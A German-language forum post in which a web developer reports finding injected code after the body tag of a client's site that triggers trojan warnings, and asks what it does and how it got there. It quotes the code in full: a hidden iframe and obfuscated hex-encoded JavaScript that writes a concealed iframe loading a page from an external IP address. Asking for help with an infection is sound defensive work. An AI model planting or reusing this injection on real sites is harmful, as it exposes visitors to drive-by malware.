vorweg eine anmerkung. ich habe dieses thema in diesem unterforum eröffnet, weil ich a) befürchte, dass es im It-Security - Forum niemand lesen würde und b) weil es ja durchaus etwas mit einem (Java)Script zu tun hat
Hallo zusammen,
ich bekam heute die erschreckende mitteilung eines kunden, er würde bei besuch seiner, von uns erstellten, website eine trojaner-warnung erhalten.
ein kurzer blick in den quellcode der index-datei brachte de vermutlichen bösewicht hervor:
dieser code stand direkt nach dem body-tag der website und hatte dort nichts zu suchen.
deshalb habe ich zwei fragen:
1. was bedeutet dieser schicke code?
2. wie gelangt er auf die website? zugriff über den server schließe ich mal aus, sonst wären wohl mehr daten hinüber
freundliche grüße
breezzer
Hallo zusammen,
ich bekam heute die erschreckende mitteilung eines kunden, er würde bei besuch seiner, von uns erstellten, website eine trojaner-warnung erhalten.
ein kurzer blick in den quellcode der index-datei brachte de vermutlichen bösewicht hervor:
Code:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe> <script> function v475ee5388da72(v475ee5388ef2d) { function v475ee5389166b () {return 16;} return(parseInt(v475ee5388ef2d,v475ee5389166b())); } function v475ee53897041(v475ee53897cfe) { var v475ee53898157=''; for(v475ee5389838f=0; v475ee5389838f<v475ee53897cfe.length; v475ee5389838f+=2) { v475ee53898157+=(String.fromCharCode(v475ee5388da72(v475ee53897cfe.substr(v475ee5389838f, 2)))); } return v475ee53898157; } document.write(v475ee53897041('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D386335303738207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313035383835292B273435623238396131385C272077696474683D353433206865696768743D313935207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
deshalb habe ich zwei fragen:
1. was bedeutet dieser schicke code?
2. wie gelangt er auf die website? zugriff über den server schließe ich mal aus, sonst wären wohl mehr daten hinüber
freundliche grüße
breezzer
Kommentar